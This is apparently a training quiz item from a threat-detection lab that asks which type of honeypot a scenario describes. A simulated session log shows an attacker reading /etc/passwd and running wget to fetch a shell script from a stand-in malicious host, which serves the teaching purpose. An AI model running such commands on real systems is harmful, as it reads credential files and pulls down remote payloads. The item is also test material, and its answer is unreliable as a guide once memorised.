Lab Simulation Active

Low-Interaction Honeypot Simulation

EC-Council CCT — Threat Detection Lab Environment

🔬

Lab Environment — Scenario

Karter deployed a honeypot to attract attackers. The system simulates an operating system and services but only responds to predefined commands instead of offering full system interaction.
🍯

Honeypot Environment

honeypot-session.log
[10:32:05] Attacker → connects to honeypot
[10:32:07] $ ls /home
→ admin guest backup
[10:32:12] $ cat /etc/passwd
→ [predefined response returned]
[10:32:18] $ wget http://malware.bad/shell.sh
→ ⚠ Command not recognized — no response
🔒 Honeypot provides restricted interaction to reduce risk

Which type of honeypot is implemented in this scenario?

A Low-interaction honeypot
B Pure honeypot
C Medium-interaction honeypot
D High-interaction honeypot